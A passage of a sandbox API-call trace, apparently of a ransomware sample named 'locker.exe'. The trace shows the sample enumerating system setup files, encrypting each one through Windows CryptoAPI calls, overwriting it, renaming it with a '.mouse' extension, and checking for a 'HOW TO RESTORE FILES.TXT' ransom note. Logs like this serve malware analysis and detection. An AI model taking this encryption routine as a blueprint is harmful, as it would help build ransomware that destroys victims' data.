hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43e570*, pdwDataLen=0x12af88c*=0x241, dwBufLen=0x260 | out: pbData=0x43e570*, pdwDataLen=0x12af88c*=0x250) returned 1 [0198.097] CryptDestroyKey (hKey=0x4329f8) returned 1 [0198.097] CryptReleaseContext (hProv=0x40a668, dwFlags=0x0) returned 1 [0198.097] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0198.097] GetLastError () returned 0x0 [0198.097] SetLastError (dwErrCode=0x0) [0198.097] GetLastError () returned 0x0 [0198.097] SetLastError (dwErrCode=0x0) [0198.097] GetLastError () returned 0x0 [0198.098] SetLastError (dwErrCode=0x0) [0198.098] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43e570 | out: hHeap=0x3c0000) returned 1 [0198.098] WriteFile (in: hFile=0x3bc, lpBuffer=0x3f6f08*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x12af7c8, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesWritten=0x12af7c8*=0x250, lpOverlapped=0x0) returned 1 [0198.098] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f6f08 | out: hHeap=0x3c0000) returned 1 [0198.098] CloseHandle (hObject=0x3bc) returned 1 [0198.099] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x414d58 | out: hHeap=0x3c0000) returned 1 [0198.099] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x440288 | out: hHeap=0x3c0000) returned 1 [0198.099] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0198.099] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0198.099] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d650 [0198.099] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43d650, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0198.099] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d650 | out: hHeap=0x3c0000) returned 1 [0198.099] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8e) returned 0x42a268 [0198.100] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0198.100] MoveFileExW (lpExistingFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), lpNewFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.mouse" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd.mouse"), dwFlags=0x2) returned 1 [0198.100] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x41fe78 [0198.100] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.mouse" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd.mouse"), dwDesiredAccess=0x100, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x3bc [0198.101] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x12af840 | out: lpSystemTimeAsFileTime=0x12af840) [0198.102] SetFileTime (hFile=0x3bc, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x12af888) returned 1 [0198.102] CloseHandle (hObject=0x3bc) returned 1 [0198.102] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41fe78 | out: hHeap=0x3c0000) returned 1 [0198.102] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42a268 | out: hHeap=0x3c0000) returned 1 [0198.102] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419c98 | out: hHeap=0x3c0000) returned 1 [0198.102] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419ca8 | out: hHeap=0x3c0000) returned 1 [0198.102] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b950 | out: hHeap=0x3c0000) returned 1 [0198.102] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cc10 | out: hHeap=0x3c0000) returned 1 [0198.103] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb80 | out: hHeap=0x3c0000) returned 1 [0198.147] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43ccd8 | out: hHeap=0x3c0000) returned 1 [0198.147] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec6e8 | out: hHeap=0x3c0000) returned 1 [0198.147] FindNextFileW (in: hFindFile=0x432df8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x3ec6e8, dwReserved1=0x241, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0198.147] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb20 [0198.147] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb20 | out: hHeap=0x3c0000) returned 1 [0198.147] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x434ff8 [0198.147] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cbc0 [0198.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="preoobe.cmd", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0198.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="preoobe.cmd", cchWideChar=11, lpMultiByteStr=0x12afcd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="preoobe.cmd", lpUsedDefaultChar=0x0) returned 11 [0198.147] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cbc0 | out: hHeap=0x3c0000) returned 1 [0198.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0198.147] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b9f8 [0198.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", cchWideChar=33, lpMultiByteStr=0x42b9f8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", lpUsedDefaultChar=0x0) returned 33 [0198.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0198.147] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bad8 [0198.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", cchWideChar=33, lpMultiByteStr=0x42bad8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", lpUsedDefaultChar=0x0) returned 33 [0198.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0198.148] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb10 [0198.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", cchWideChar=33, lpMultiByteStr=0x42bb10, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", lpUsedDefaultChar=0x0) returned 33 [0198.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0198.148] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb80 [0198.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", cchWideChar=33, lpMultiByteStr=0x42bb80, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", lpUsedDefaultChar=0x0) returned 33 [0198.148] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb80 | out: hHeap=0x3c0000) returned 1 [0198.148] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb10 | out: hHeap=0x3c0000) returned 1 [0198.148] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bad8 | out: hHeap=0x3c0000) returned 1 [0198.148] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b9f8 | out: hHeap=0x3c0000) returned 1 [0198.148] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12af9d0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0198.148] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be58 [0198.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".cmd", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0198.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".cmd", cchWideChar=4, lpMultiByteStr=0x12afc3c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".cmd", lpUsedDefaultChar=0x0) returned 4 [0198.148] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b9f8 [0198.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0198.148] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cc88 [0198.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x43cc88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS", lpUsedDefaultChar=0x0) returned 21 [0198.148] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b9f8 | out: hHeap=0x3c0000) returned 1 [0198.148] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cbc0 [0198.148] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b9f8 [0198.148] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cbc0 | out: hHeap=0x3c0000) returned 1 [0198.148] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bbb8 [0198.149] AreFileApisANSI () returned 1 [0198.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42bbb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0198.149] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x5e) returned 0x3ec6e8 [0198.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42bbb8, cbMultiByte=-1, lpWideCharStr=0x3ec6e8, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\HOW TO RESTORE FILES.TXT") returned 47 [0198.149] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\$getcurrent\\safeos\\how to restore files.txt"), fInfoLevelId=0x0, lpFileInformation=0x12afa6c | out: lpFileInformation=0x12afa6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x767ae577, ftCreationTime.dwHighDateTime=0x1d6ad29, ftLastAccessTime.dwLowDateTime=0x767ae577, ftLastAccessTime.dwHighDateTime=0x1d6ad29, ftLastWriteTime.dwLowDateTime=0x767d471e, ftLastWriteTime.dwHighDateTime=0x1d6ad29, nFileSizeHigh=0x0, nFileSizeLow=0x71)) returned 1 [0198.149] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec6e8 | out: hHeap=0x3c0000) returned 1 [0198.149] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bbb8 | out: hHeap=0x3c0000) returned 1 [0198.149] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12afa04 | out: lpFileInformation=0x12afa04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a)) returned 1 [0198.150] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435050 [0198.150] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0198.150] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4a [0198.150] CloseHandle (hObject=0x3bc) returned 1 [0198.150] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435050 | out: hHeap=0x3c0000) returned 1 [0198.150] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435208 [0198.150] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435208 | out: hHeap=0x3c0000) returned 1 [0198.150] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435050 [0198.151] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435050 | out: hHeap=0x3c0000) returned 1 [0198.151] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0198.151] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d908 [0198.151] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43d908, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0198.151] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d908 | out: hHeap=0x3c0000) returned 1 [0198.151] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435208 [0198.151] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0198.151] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4a [0198.151] CloseHandle (hObject=0x3bc) returned 1 [0198.151] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435208 | out: hHeap=0x3c0000) returned 1 [0198.151] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419c38 [0198.151] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419c98 [0198.152] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x12af700, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc [0198.152] GetFileType (hFile=0x3bc) returned 0x1 [0198.152] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a) returned 0x420418 [0198.152] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a) returned 0x4203a0 [0198.152] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x43e570 [0198.152] ReadFile (in: hFile=0x3bc, lpBuffer=0x43e570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12af714, lpOverlapped=0x0 | out: lpBuffer=0x43e570*, lpNumberOfBytesRead=0x12af714*=0x4a, lpOverlapped=0x0) returned 1 [0198.154] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x4a, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0198.154] GetVersion () returned 0x23f00206 [0198.154] CryptAcquireContextA (in: phProv=0x12af890, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12af890*=0x40a668) returned 1 [0198.157] CryptImportKey (in: hProv=0x40a668, pbData=0x12af8bc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x12af894 | out: phKey=0x12af894*=0x4329f8) returned 1 [0198.157] CryptSetKeyParam (hKey=0x4329f8, dwParam=0x4, pbData=0x12af888*=0x2, dwFlags=0x0) returned 1 [0198.158] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec6e8 [0198.158] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ec6e8*, pdwDataLen=0x12af88c*=0x4a, dwBufLen=0x60 | out: pbData=0x3ec6e8*, pdwDataLen=0x12af88c*=0x50) returned 1 [0198.158] CryptDestroyKey (hKey=0x4329f8) returned 1 [0198.158] CryptReleaseContext (hProv=0x40a668, dwFlags=0x0) returned 1 [0198.158] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0198.158] GetLastError () returned 0x0 [0198.158] SetLastError (dwErrCode=0x0) [0198.158] GetLastError () returned 0x0 [0198.158] SetLastError (dwErrCode=0x0) [0198.158] GetLastError () returned 0x0 [0198.158] SetLastError (dwErrCode=0x0) [0198.159] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec6e8 | out: hHeap=0x3c0000) returned 1 [0198.159] WriteFile (in: hFile=0x3bc, lpBuffer=0x43e570*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12af7c8, lpOverlapped=0x0 | out: lpBuffer=0x43e570*, lpNumberOfBytesWritten=0x12af7c8*=0x50, lpOverlapped=0x0) returned 1 [0198.159] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43e570 | out: hHeap=0x3c0000) returned 1 [0198.159] CloseHandle (hObject=0x3bc) returned 1 [0198.160] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x420418 | out: hHeap=0x3c0000) returned 1 [0198.160] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4203a0 | out: hHeap=0x3c0000) returned 1 [0198.160] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435050 [0198.160] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0198.160] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d908 [0198.160] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43d908, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0198.160] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d908 | out: hHeap=0x3c0000) returned 1 [0198.160] MoveFileExW (lpExistingFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), lpNewFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd.mouse" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd.mouse"), dwFlags=0x2) returned 1 [0198.161] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x4350a8 [0198.161] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd.mouse" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd.mouse"), dwDesiredAccess=0x100, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x3bc [0198.161] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x12af840 | out: lpSystemTimeAsFileTime=0x12af840) [0198.161] SetFileTime (hFile=0x3bc, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x12af888) returned 1 [0198.162] CloseHandle (hObject=0x3bc) returned 1 [0198.162] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4350a8 | out: hHeap=0x3c0000) returned 1 [0198.162] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435050 | out: hHeap=0x3c0000) returned 1 [0198.162] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419c98 | out: hHeap=0x3c0000) returned 1 [0198.162] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419c38 | out: hHeap=0x3c0000) returned 1 [0198.162] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b9f8 | out: hHeap=0x3c0000) returned 1 [0198.162] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cc88 | out: hHeap=0x3c0000) returned 1 [0198.162] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be58 | out: hHeap=0x3c0000) returned 1 [0198.162] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x434ff8 | out: hHeap=0x3c0000) returned 1 [0198.162] FindNextFileW (in: hFindFile=0x432df8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x434ff8, dwReserved1=0x4a, cFileName="SetupComplete.cmd", cAlternateFileName="")) returned 1 [0198.162] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be90 [0198.162] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be90 | out: hHeap=0x3c0000) returned 1 [0198.162] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x434ff8 [0198.162] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb80 [0198.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="SetupComplete.cmd", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0198.162] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43ccd8 [0198.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="SetupComplete.cmd", cchWideChar=17, lpMultiByteStr=0x43ccd8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupComplete.cmd", lpUsedDefaultChar=0x0) returned 17 [0198.162] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb80 | out: hHeap=0x3c0000) returned 1 [0198.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0198.163] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b9f8 [0198.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", cchWideChar=39, lpMultiByteStr=0x42b9f8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", lpUsedDefaultChar=0x0) returned 39 [0198.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0198.163] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bbf0 [0198.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", cchWideChar=39, lpMultiByteStr=0x42bbf0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", lpUsedDefaultChar=0x0) returned 39 [0198.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0198.163] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, 